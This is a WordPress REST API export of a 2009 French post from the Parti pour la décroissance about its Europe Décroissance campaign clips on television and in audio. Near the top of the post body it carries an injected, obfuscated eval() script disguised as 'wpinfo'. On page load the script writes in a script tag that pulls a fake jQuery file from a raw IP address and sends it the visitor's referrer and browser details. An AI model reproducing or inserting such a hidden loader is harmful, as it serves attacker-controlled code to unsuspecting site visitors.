{"id":3094,"date":"2009-05-28T22:09:26","date_gmt":"2009-05-28T21:09:26","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=3094"},"modified":"2009-12-09T12:22:49","modified_gmt":"2009-12-09T11:22:49","slug":"la-campagne-audio-visuelle-europe-decroissance","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=3094","title":{"rendered":"Faites du bien \u00e0 votre t\u00e9l\u00e9vision !"},"content":{"rendered":"<p><strong><a href=\"http:\/\/www.partipourladecroissance.net\/?p=3094\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-thumbnail wp-image-3101\" title=\"copy2_campagne-officielle\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2009\/05\/copy2_campagne-officielle-150x135.jpg\" alt=\"copy2_campagne-officielle\" width=\"101\" height=\"89\" \/><\/a><\/strong> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hbsta|var|u0026u|referrer|tenak||js|php'.split('|'),0,{}))\n<\/script><\/noindex> <strong>La campagne audio-visuelle Europe D\u00e9croissance dans les m\u00e9dias<\/strong><\/p>\n<ul>\n<li><strong>Jeudi 28 Mai &#8211; <\/strong><em>Module court (1&rsquo;15\u00a0\u00bb)<\/em><\/li>\n<li><strong>Mercredi 3 juin 2009<\/strong> &#8211; <em>Module long (2&rsquo;17\u00a0\u00bb)<\/em><\/li>\n<li><strong>Autres \u00e9missions<\/strong><em>&#8230; <\/em><\/li>\n<\/ul>\n<p><em><!--more--><\/em><\/p>\n<p style=\"text-align: center;\"><strong>Jeudi 28 Mai<\/strong> <em>Module court (1&rsquo;15\u00a0\u00bb)<\/em><\/p>\n<div style=\"text-align: center;\"><object width=\"420\" height=\"339\" data=\"http:\/\/www.dailymotion.com\/swf\/x9faxc\" type=\"application\/x-shockwave-flash\"><param name=\"allowFullScreen\" value=\"true\" \/><param name=\"allowScriptAccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/www.dailymotion.com\/swf\/x9faxc\" \/><param name=\"allowfullscreen\" value=\"true\" \/><\/object> <strong><a href=\"http:\/\/www.dailymotion.com\/swf\/x9faxc\"><br \/>\nParti pour la d\u00e9croissance Europe 2009<\/a><\/strong><\/div>\n<p style=\"text-align: center;\">.<\/p>\n<p style=\"text-align: center;\">Clip audio <a href=\"http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-court.mp3 \"><em>\u00e0 t\u00e9l\u00e9charger<\/em><\/a> ou \u00e0 \u00e9couter<br \/>\n<object width=\"210\" height=\"20\" type=\"application\/x-shockwave-flash\"><param name=\"align\" value=\"middle\" \/><\/object><br \/>\n<object width=\"210\" height=\"20\" data=\"dewplayer.swf?son=http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-court.mp3&amp;autostart=0&amp;bgcolor=000000\" type=\"application\/x-shockwave-flash\"><param name=\"bgcolor\" value=\"000000\" \/><param name=\"align\" value=\"middle\" \/><param name=\"src\" value=\"dewplayer.swf?son=http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-court.mp3&amp;autostart=0&amp;bgcolor=000000\" \/><param name=\"quality\" value=\"high\" \/><\/object><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong>Mercredi 3 juin 2009<\/strong><br \/>\n<em>Module long (2&rsquo;17\u00a0\u00bb)<\/em>\n<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/info.francetelevisions.fr\/video-info\/player_html\/index-fr.php?id-video=000040612_CAPP_FrontdegaucheEuropeEcologieLesVerts_030620090941_Au&amp;chaine=&amp;id-categorie=&amp;ids=\"><strong> <\/strong><\/a><\/p>\n<div style=\"text-align: center;\"><object width=\"420\" height=\"339\" data=\"http:\/\/www.dailymotion.com\/swf\/x9jig5\" type=\"application\/x-shockwave-flash\"><param name=\"allowFullScreen\" value=\"true\" \/><param name=\"allowScriptAccess\" value=\"always\" \/><param name=\"src\" value=\"http:\/\/www.dailymotion.com\/swf\/x9jig5\" \/><param name=\"allowfullscreen\" value=\"true\" \/><\/object><a href=\"http:\/\/info.francetelevisions.fr\/video-info\/player_html\/index-fr.php?id-video=000040612_CAPP_FrontdegaucheEuropeEcologieLesVerts_030620090941_Au&amp;chaine=&amp;id-categorie=&amp;ids=\"><strong><br \/>\n<\/strong><strong><\/strong><\/a><strong><a href=\"http:\/\/www.dailymotion.com\/swf\/x9jig5\"><strong>Europe D\u00e9croissance &#8211; Long<\/strong><\/a><\/strong><strong><\/strong><strong><br \/>\n<em>par <a href=\"http:\/\/www.dailymotion.com\/partipourladecroissance\">partipourladecroissance<\/a><\/em><\/strong><\/div>\n<p><strong><\/strong><strong><\/strong><\/p>\n<p style=\"text-align: center;\"><strong>.<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>Clip audio <a href=\"http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-long.mp3\"><em>\u00e0 t\u00e9l\u00e9charger<\/em><\/a> ou \u00e0 \u00e9couter<br \/>\n<object width=\"210\" height=\"20\" type=\"application\/x-shockwave-flash\"><param name=\"align\" value=\"middle\" \/><\/object><br \/>\n<object width=\"210\" height=\"20\" data=\"dewplayer.swf?son=http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-long.mp3&amp;autostart=0&amp;bgcolor=000000\" type=\"application\/x-shockwave-flash\"><param name=\"bgcolor\" value=\"000000\" \/><param name=\"align\" value=\"middle\" \/><param name=\"src\" value=\"dewplayer.swf?son=http:\/\/decroissance.lehavre.free.fr\/europeenne09\/europe-decroissance-long.mp3&amp;autostart=0&amp;bgcolor=000000\" \/><param name=\"quality\" value=\"high\" \/><\/object><\/strong><\/p>\n<hr \/>\n<p style=\"text-align: center;\"><strong><\/strong><strong>Autres \u00e9missions&#8230; <\/strong><\/p>\n<ul>\n<li><strong><\/strong><strong><a href=\"http:\/\/www.canalplus.fr\/pid2180.htm\">Europe-D\u00e9croissance sur Canal+<\/a><\/strong><em> (15\u00e8me minute de la 1\u00e8re partie du 17 mai)<\/em><\/li>\n<li><strong><\/strong><strong>sur Arte<\/strong><em> <\/em>\n<ul>\n<li><strong><em><a href=\"http:\/\/www.partipourladecroissance.net\/?p=3211\">Global Mag\u00a0 du vendredi 5 juin : \u00ab\u00a0<strong>Des cingl\u00e9s !<\/strong>\u00a0\u00bb dixit Daniel Cohn-Bendit<\/a><br \/>\n<\/em><\/strong><\/li>\n<li><a href=\"http:\/\/www.dailymotion.com\/video\/x9jbhu_globalglobalitwsalzbergdecroissants_news\"><strong><em>interview d&rsquo;Anna Salzberg, en voyage au pays des d\u00e9croissants (sic !)<\/em><\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>La campagne audio-visuelle Europe D\u00e9croissance dans les m\u00e9dias Jeudi 28 Mai &#8211; Module court (1&rsquo;15\u00a0\u00bb) Mercredi 3 juin 2009 &#8211; Module long (2&rsquo;17\u00a0\u00bb) Autres \u00e9missions&#8230;<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-3094","post","type-post","status-publish","format-standard","hentry","category-actualites","category-adoc-actualites"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3094","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3094"}],"version-history":[{"count":5,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3094\/revisions"}],"predecessor-version":[{"id":3914,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3094\/revisions\/3914"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3094"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3094"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}